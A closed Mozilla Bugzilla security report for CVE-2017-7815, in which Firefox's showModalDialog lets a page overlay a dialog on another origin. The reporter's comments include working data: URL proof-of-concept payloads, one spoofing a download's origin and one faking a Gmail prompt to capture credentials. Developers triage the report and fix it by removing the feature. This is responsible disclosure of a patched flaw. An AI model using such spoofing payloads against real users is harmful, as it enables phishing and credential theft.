Closed Bug 1368981 (CVE-2017-7815)
Opened 8 years ago, closed 7 years ago
Firefox allows you to insert a modal dialog in any domain
Categories: Core :: DOM: Core & HTML, defect, P2
People: Reporter: jm.acuna73, Assigned: mrbkap
Keywords: reporter-external, sec-moderate
Whiteboard: [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796
Attachments (1 file): 3.39 MB, video/webm
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce:
1- Go to:
data:text/html,<script>function loadIframe() {win = open('','_top');win.document.open();win.document.write('data:text/html,<s'+'cript>location="https://www.google.com";</s'+'cript>');win.document.close();}function go() {var iframe = '<iframe onload="loadIframe();"></iframe>';document.body.innerHTML = iframe; showModalDialog('https://www.firefox.com','','dialogWidth=600;dialogHeight=600');}</script><input type="button" onclick="go()" value="test"/>
2- Click button
Bug detected in Firefox browsers that do not use multi-process architecture or e10s
Tested in:
Firefox Nightly 55.0a1 (2017-05-17) (64-bit)
Firefox Developer Edition 54.0a2 (2017-04-18) (32-bit)
Firefox 53.0.2 (32-bit)
Note:
I consider that it is not a variant of the bug with id 1365875, because the showModalDialog method is not one of the three types of native popup boxes in JavaScript.
Updated•8 years ago (Reporter)
Group: firefox-core-security
Updated•8 years ago
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM
Product: Firefox → Core
Version: 55 Branch → unspecified
Comment 1•8 years ago (Reporter)
You could use the showModalDialog method to download a file from an unauthorized domain.
Example:
data:text/html,<input type="button" onclick="go()" value="test"/><script>
  function loadIframe() {
    // Runs from the hidden iframe's onload while the modal dialog is still open:
    // replaces the top-level document so the dialog appears over a different origin
    var win = open('', '_top');
    win.document.open();
    win.document.write('data:text/html,<s'+'cript>location = \'https://www.google.com\';</s'+'cript>');
    win.document.close();
  }
  function go() {
    // Zero-size iframe whose onload triggers loadIframe()
    var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
    document.body.innerHTML += iframe;
    // Modal dialog pointing at a file on a third-party domain
    window.showModalDialog('http://d.7-zip.org/a/7z1700.exe', window, 'dialogWidth=100px;dialogHeight:100px');
  }
</script>
Comment 2•8 years ago (Reporter)
And it could even steal the credentials of an unsuspecting user.
Go to:
data:text/html,<input type="button" onclick="go()" value="test"/>
<script>
  function loadIframe() {
    // Runs from the hidden iframe's onload while the modal dialog is still open:
    // replaces the top-level document with a navigation to another origin
    var win = open('', '_top');
    win.document.open();
    win.document.write('data:text/html,<s'+'cript>location = \'https://mail.google.com\';</s'+'cript>');
    win.document.close();
  }
  function go() {
    // Zero-size iframe whose onload triggers loadIframe()
    var iframe = '<iframe style="border:0;height:0;width:0" onload="loadIframe();"></iframe>';
    document.body.innerHTML = iframe;
    // Modal dialog served from a data: URL, shown over the replaced top-level document
    window.showModalDialog('data:text/html,<h3>Loading...</h3><input type="button" value="Accept" onclick="window.close()"/>', window, 'dialogWidth=100px;dialogHeight:100px');
    location = 'http://feeds.feedburner.com/GoogleInbox';
  }
</script>
Comment 3•8 years ago
We're removing showModalDialog with e10s (in bug 981796), right, Blake?
Flags: needinfo?(mrbkap)
Comment 4•8 years ago
(In reply to Andrew Overholt [:overholt] from comment #3)
> We're removing showModalDialog with e10s (in bug 981796), right, Blake?
showModalDialog isn't supported with e10s, and comment 0 says this doesn't affect e10s.
We looked at this in sec triage, and it seemed like a fairly convincing spoof.
Comment 5•8 years ago (Reporter)
Updated•8 years ago
See Also: → CVE-2017-7791
Comment 6•8 years ago (Assignee)
Let's just turn off showModalDialog for everybody. It'll be behind a pref for a bit and we'll remove the code soon after.
Updated•8 years ago (Assignee)
Flags: needinfo?(mrbkap)
Comment 7•8 years ago
I was thinking we'd eventually get e10s to 100% but comment 6 works for me. I'm assuming we'll just do that in bug 981796.
Comment 8•8 years ago
And Blake sent email: https://groups.google.com/forum/#!msg/mozilla.dev.platform/4t5AAxxrCoA/hFXL2HsGBwAJ
Updated•8 years ago
Priority: -- → P2
Updated•8 years ago
Keywords: sec-moderate
Updated•8 years ago
Flags: sec-bounty?
Comment 9•7 years ago (Reporter)
Hi,
I do not know exactly what "bug which should be worked on in the next release/iteration" means,
but I have checked that it reproduces in:
- Firefox 55.0.3 (32-bit)
- Firefox ESR 52.3.0 (64-bit)
It does not reproduce in:
- Firefox Developer Edition 56.0b3 (32-bit)
- Firefox Nightly 57.0a1 (2017-08-28) (64-bit)
Tested in Firefox browsers that do not use multi-process architecture or e10s.
(I used the html code from Comment 2)
Comment 10•7 years ago
This was fixed via bug 981796, which removed showModalDialog.
Assignee: nobody → mrbkap
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
status-firefox55: --- → wontfix
status-firefox56: --- → fixed
status-firefox57: --- → fixed
status-firefox-esr52: --- → wontfix
Resolution: --- → FIXED
Comment 11•7 years ago (Reporter)
I understand now :)
Thank you!
Updated•7 years ago
Flags: sec-bounty? → sec-bounty+
Whiteboard: Fixed by removing ShowModalDialog in bug 981796
Updated•7 years ago
Group: dom-core-security → core-security-release
Updated•7 years ago
Alias: CVE-2017-7815
Whiteboard: Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+] Fixed by removing ShowModalDialog in bug 981796
Updated•7 years ago
Flags: qe-verify-
Whiteboard: [adv-main56+] Fixed by removing ShowModalDialog in bug 981796 → [adv-main56+][post-critsmash-triage] Fixed by removing ShowModalDialog in bug 981796
Updated•7 years ago
Group: core-security-release
Updated•6 years ago
Component: DOM → DOM: Core & HTML
Updated•9 months ago
Keywords: reporter-external